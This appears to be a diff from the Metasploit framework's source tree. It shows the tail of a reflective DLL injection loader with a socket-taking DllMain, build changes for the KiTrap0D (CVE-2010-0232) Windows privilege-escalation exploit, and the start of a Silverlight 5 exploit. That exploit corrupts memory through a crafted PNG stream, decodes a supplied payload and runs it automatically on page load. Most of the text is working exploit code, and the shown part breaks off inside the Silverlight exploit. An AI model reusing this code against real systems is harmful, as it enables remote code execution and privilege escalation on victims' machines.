uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
// check if their are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// and we itterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
// uiValueB = number of entries in this relocation block
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while( uiValueB-- )
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
#ifdef WIN_ARM
// Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T )
{
register DWORD dwInstruction;
register DWORD dwAddress;
register WORD wImm;
// get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) );
// flip the words to get the instruction as expected
dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
// sanity chack we are processing a MOV instruction...
if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT )
{
// pull out the encoded 16bit value (the high portion of the address-to-relocate)
wImm = (WORD)( dwInstruction & 0x000000FF);
wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
// apply the relocation to the target address
dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF;
// now create a new instruction with the same opcode and register param.
dwInstruction = (DWORD)( dwInstruction & ARM_MOV_MASK2 );
// patch in the relocated address...
dwInstruction |= (DWORD)(dwAddress & 0x00FF);
dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
// now flip the instructions words and patch back into the code...
*(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
}
}
#endif
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
// get the next entry in the current relocation block
uiValueD += sizeof( IMAGE_RELOC );
}
// get the next entry in the relocation directory
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
}
}
// STEP 6: call our images entry point
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
OUTPUTDBG("Flushing the instruction cache");
// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
// call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
#else
// if we are injecting an DLL via a stub we call DllMain with no parameter
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
#endif
// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
return uiValueA;
}
//===============================================================================================//
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// you must implement this function...
extern DWORD DLLEXPORT Init( SOCKET socket );
BOOL MetasploitDllAttach( SOCKET socket )
{
Init( socket );
return TRUE;
}
BOOL MetasploitDllDetach( DWORD dwExitFunc )
{
switch( dwExitFunc )
{
case EXITFUNC_SEH:
SetUnhandledExceptionFilter( NULL );
break;
case EXITFUNC_THREAD:
ExitThread( 0 );
break;
case EXITFUNC_PROCESS:
ExitProcess( 0 );
break;
default:
break;
}
return TRUE;
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_METASPLOIT_ATTACH:
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
break;
case DLL_METASPLOIT_DETACH:
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
break;
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
#endif
//===============================================================================================//

View File

@ -1,223 +0,0 @@
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Winsock2.h>
#include <intrin.h>
#include "ReflectiveDLLInjection.h"
// Enable this define to turn on OutputDebugString support
//#define ENABLE_OUTPUTDEBUGSTRING 1
// Enable this define to turn on locking of memory to prevent paging
#define ENABLE_STOPPAGING 1
#define EXITFUNC_SEH 0xEA320EFE
#define EXITFUNC_THREAD 0x0A2A1DE0
#define EXITFUNC_PROCESS 0x56A2B5F0
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define NTDLLDLL_HASH 0x3CFA685D
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8
#ifdef ENABLE_STOPPAGING
typedef LPVOID (WINAPI * VIRTUALLOCK)( LPVOID, SIZE_T );
#define VIRTUALLOCK_HASH 0x0EF632F2
#endif
#ifdef ENABLE_OUTPUTDEBUGSTRING
typedef LPVOID (WINAPI * OUTPUTDEBUG)( LPCSTR );
#define OUTPUTDEBUG_HASH 0x470D22BC
#endif
#define IMAGE_REL_BASED_ARM_MOV32A 5
#define IMAGE_REL_BASED_ARM_MOV32T 7
#define ARM_MOV_MASK (DWORD)(0xFBF08000)
#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00)
#define ARM_MOVW 0xF2400000
#define ARM_MOVT 0xF2C00000
#define HASH_KEY 13
//===============================================================================================//
#pragma intrinsic( _rotr )
__forceinline DWORD ror( DWORD d )
{
return _rotr( d, HASH_KEY );
}
__forceinline DWORD _hash( char * c )
{
register DWORD h = 0;
do
{
h = ror( h );
h += *c;
} while( *++c );
return h;
}
//===============================================================================================//
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
typedef struct _LDR_DATA_TABLE_ENTRY
{
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
DWORD dwLength;
DWORD dwInitialized;
LPVOID lpSsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
struct _PEB_FREE_BLOCK * pNext;
DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
typedef struct __PEB // 65 elements, 0x210 bytes
{
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;
PPEB_LDR_DATA pLdr;
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;
LARGE_INTEGER liCriticalSectionTimeout;
DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
typedef struct
{
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
//===============================================================================================//
#endif
//===============================================================================================//

View File

@ -10,11 +10,11 @@
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../common/ReflectiveLoader.c"
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include <stdio.h>
#include "../common/common.h"
#include "../common/LoadLibraryR.h"
#include "../../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
#include "../common/ResourceLoader.h"
#include "resource.h"

View File

@ -49,7 +49,7 @@
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -81,7 +81,7 @@
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -121,17 +121,21 @@
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2010-0232\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2010-0232\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2010-0232\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\common\LoadLibraryR.c" />
<ClCompile Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
<ClCompile Include="..\common\ResourceLoader.c" />
<ClCompile Include="kitrap0d.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.h" />
<ClInclude Include="..\common\common.h" />
<ClInclude Include="..\common\LoadLibraryR.h" />
<ClInclude Include="..\common\ResourceLoader.h" />
<ClInclude Include="resource.h" />
</ItemGroup>

View File

@ -2,24 +2,24 @@
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="kitrap0d.c" />
<ClCompile Include="..\common\LoadLibraryR.c">
<Filter>common</Filter>
</ClCompile>
<ClCompile Include="..\common\ResourceLoader.c">
<Filter>common</Filter>
</ClCompile>
<ClCompile Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c">
<Filter>RDI</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="resource.h" />
<ClInclude Include="..\common\common.h">
<Filter>common</Filter>
</ClInclude>
<ClInclude Include="..\common\LoadLibraryR.h">
<Filter>common</Filter>
</ClInclude>
<ClInclude Include="..\common\ResourceLoader.h">
<Filter>common</Filter>
</ClInclude>
<ClInclude Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.h">
<Filter>RDI</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="kitrap0d.rc" />
@ -28,5 +28,8 @@
<Filter Include="common">
<UniqueIdentifier>{cbb362dd-4029-4348-86d3-62c4b22c742d}</UniqueIdentifier>
</Filter>
<Filter Include="RDI">
<UniqueIdentifier>{662e77af-b8cd-4717-a3f2-87b2ec57f46c}</UniqueIdentifier>
</Filter>
</ItemGroup>
</Project>

View File

@ -49,7 +49,7 @@
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@ -75,7 +75,7 @@
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>

View File

@ -7,7 +7,7 @@
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../common/ReflectiveLoader.c"
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include <stdlib.h>
#include "kitrap0d.h"

View File

@ -0,0 +1,18 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\kitrap0d.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86" />
<Target Name="x86">
<Message Text="Building CVE-2010-0232 KiTrap0D x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="KiTrap0D is not supported in x64" />
</Target>
</Project>

View File

@ -0,0 +1,12 @@
SilverApp1/Release/
SilverApp1/Debug/
SilverApp1/Bin/Release/
SilverApp1/Bin/Debug/
SilverApp1/obj/Release/
SilverApp1/obj/Debug/
SilverApp1/SilverApp1.csproj.user
SilverApp1.ncb
SilverApp1.suo
SilverApp1.sdf
SilverApp1.opensdf
SilverApp1.v11.suo

View File

@ -0,0 +1,14 @@
Original Exploit by Vitaliy Toropov
See Packet Storm Advisory 2013-1022-1
http://packetstormsecurity.com/files/123732/PSA-2013-1022-1.txt
Source code just modified to add a new Silverlight 5 target and tweak it to allow dynamic payloads, not
just the hardcoded one.
In order to put an environment ready:
- Install Visual Studio 2010
- Install Visual Studio 2010 SP1
- Install Silverlight 5 tools for Visual Studio 2010. (http://www.microsoft.com/en-us/download/details.aspx?id=28358)
- Install the Silverlight5 Developer version (SDK) needed for testing.

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Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SilverApp1", "SilverApp1\SilverApp1.csproj", "{D33B3660-E6CA-4B29-9E09-0DF99B28840E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

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<Application xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
x:Class="SilverApp1.App"
>
<Application.Resources>
</Application.Resources>
</Application>

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using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Windows;
using System.Windows.Controls;
using System.Windows.Documents;
using System.Windows.Input;
using System.Windows.Media;
using System.Windows.Media.Animation;
using System.Windows.Shapes;
namespace SilverApp1
{
public partial class App : Application
{
public App()
{
this.Startup += this.Application_Startup;
this.Exit += this.Application_Exit;
this.UnhandledException += this.Application_UnhandledException;
InitializeComponent();
}
private void Application_Startup(object sender, StartupEventArgs e)
{
this.RootVisual = new MainPage(e.InitParams);
}
private void Application_Exit(object sender, EventArgs e)
{
}
private void Application_UnhandledException(object sender, ApplicationUnhandledExceptionEventArgs e)
{
// If the app is running outside of the debugger then report the exception using
// the browser's exception mechanism. On IE this will display it a yellow alert
// icon in the status bar and Firefox will display a script error.
if (!System.Diagnostics.Debugger.IsAttached) {
// NOTE: This will allow the application to continue running after an exception has been thrown
// but not handled.
// For production applications this error handling should be replaced with something that will
// report the error to the website and stop the application.
e.Handled = true;
Deployment.Current.Dispatcher.BeginInvoke(delegate { ReportErrorToDOM(e); });
}
}
private void ReportErrorToDOM(ApplicationUnhandledExceptionEventArgs e)
{
try {
string errorMsg = e.ExceptionObject.Message + e.ExceptionObject.StackTrace;
errorMsg = errorMsg.Replace('"', '\'').Replace("\r\n", @"\n");
System.Windows.Browser.HtmlPage.Window.Eval("throw new Error(\"Unhandled Error in Silverlight Application " + errorMsg + "\");");
}
catch (Exception) {
}
}
}
}

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<UserControl x:Class="SilverApp1.MainPage"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
mc:Ignorable="d"
d:DesignHeight="400" d:DesignWidth="600" xmlns:sdk="http://schemas.microsoft.com/winfx/2006/xaml/presentation/sdk" Width="Auto" Height="Auto">
<Grid x:Name="LayoutRoot" Background="White" Height="400" Width="600">
<Button Content="Run..." Height="23" HorizontalAlignment="Right" Margin="0,367,241,0" Name="btnClickMe" VerticalAlignment="Top" Width="119" Click="btnClickMe_Click" />
<RichTextBox HorizontalAlignment="Left" Margin="12,32,0,0" Name="richTxtBox" VerticalAlignment="Top" Height="330" Width="576" TextWrapping="NoWrap" HorizontalScrollBarVisibility="Auto" />
<TextBlock Height="23" HorizontalAlignment="Right" Margin="0,4,12,0" Name="textBlock1" Text="Silverlight Application" VerticalAlignment="Top" Width="576" Foreground="Navy" FontSize="14" TextAlignment="Center" />
</Grid>
</UserControl>

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using System;
using System.Windows;
using System.Windows.Controls;
using System.Windows.Documents;
using System.IO;
using System.Windows.Media.Imaging;
using System.Resources;
namespace SilverApp1
{
// declare custom MemoryStream w/ malicious Read()
public class
MyStream : MemoryStream
{
// raw PNG image data w/o PLTE chunk data // not the shellcode :)
static byte[] pngStart = {
0x89,0x50,0x4E,0x47,0x0D,0x0A,0x1A,0x0A, // PNG header
0,0,0,0x0D,0x49,0x48,0x44,0x52,0,0,0,0x08,0,0,0,0x04,0x08,0x03,0,0,0,0x84,0x13,0x8E,0xC2, // IHDR chunk
0,0,0x03,0,0x50,0x4C,0x54,0x45 // PLTE chunk header
};
static byte[] pngEnd = {
0,0,0,0, // PLTE chunk checksum can be 0
0,0,0,0x2F,0x49,0x44,0x41,0x54,0x78,0xDA,0x01,0x24,0,0xDB,0xFF,0,0,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0,0x08,0x09,0x0A,0x0B,0x0C,0x0D,
0x0E,0x0F,0,0x10,0x11,0x12,0x13,0x14,0x15,0x16,0x17,0,0x18,0x19,0x1A,0x1B,0x1C,0x1D,0x1E,0x1F,0x17,0x1C,0x01,0xF1,0x7D,0xBE,0xC7,0x66, // IDAT chunk
0,0,0,0,0x49,0x45,0x4E,0x44,0xAE,0x42,0x60,0x82 // IEND chunk
};
Object[] obj;
public byte[] png;
public int offs;
// create Stream basing on pngStart[]
public MyStream() : base(pngStart)
{
}
int ReadBuf(byte[] buffer, int offset, int count)
{
// calc true PNG image length
int res = pngStart.Length + 0x300 + pngEnd.Length;
base.Read(buffer, offset, count); // (count = buffer.Length) < res
MainPage.LogAdd("MyStream.Read(["+buffer.Length+"],"+offset+","+count+") = " + res);
return res;
}
// override Read()
public override int Read(byte[] buffer, int offset, int count)
{
// allocate arrays sequentially in memory
int len = pngEnd.Length;
obj = new object[] { null, null }; // as PLTE data
png = new byte[0x300 + len - offs]; // as rest PNG data
MainPage.buf = new uint[3]; // the target array for memory corruption
MainPage.obj = new object[3]; // aux array
// copy the trail PNG data
Array.Copy(pngEnd, 0, png, png.Length-len, len);
// save pointers in PLTE data
obj[0] = png;
obj[1] = MainPage.buf;
// return "bytes read" > "count" to trigger the memory disclosure
return ReadBuf(buffer, offset, count);
}
}
// declare descendant for System.Windows.Browser.ScriptObject to access vulnerable protected Initialize()
public class MyObject : System.Windows.Browser.HtmlObject
{
public MyObject()
: base()
{
}
// access protected Initialize()
public void Init(IntPtr handle)
{
MainPage.LogAdd("ScriptObject.Initialize(" + MainPage.Hex((ulong)handle) + ", 1, true, false)");
Initialize(handle, (IntPtr)1, true, false); // call agcore.dll DOM_ReferenceObject()
}
}
public partial class MainPage : UserControl
{
public static RichTextBox tbox;
public static uint[] buf;
public static ulong bufAddr;
public static object[] obj;
public static bool is64;
public static Version vsn;
public static byte[] payload;
public MainPage(System.Collections.Generic.IDictionary<string, string> iDictionary)
{
#if DEBUG
InitializeComponent();
tbox = richTxtBox;
#endif
// print environment info
vsn = Environment.Version;
LogAdd("Silverlight: " + vsn.ToString() + "\n" + "OS: " + Environment.OSVersion.ToString());
payload = Convert.FromBase64String(iDictionary["payload"]);
LogAdd(String.Format("Payload decoded length: {0}", payload.Length));
#if !DEBUG
//TODO: First try doesn't overwritte Payload(), need to dig why, should...
exploit();
exploit();
#endif
}
// prints message into richTextBox
public static void LogAdd(string txt)
{
#if DEBUG
Paragraph p = new Paragraph();
p.Inlines.Add(txt);
tbox.Blocks.Add(p);
#endif
}
public static void LogAdd(object obj)
{
#if DEBUG
LogAdd(obj == null ? "null" : obj.ToString());
#endif
}
// converts int to hex string
public static string Hex(int u)
{
return u <= 9 ? u.ToString() : "0x" + u.ToString("X");
}
public static string Hex(ulong u)
{
return u <= 9 ? u.ToString() : "0x" + u.ToString("X");
}
// reads pointer from byte[]
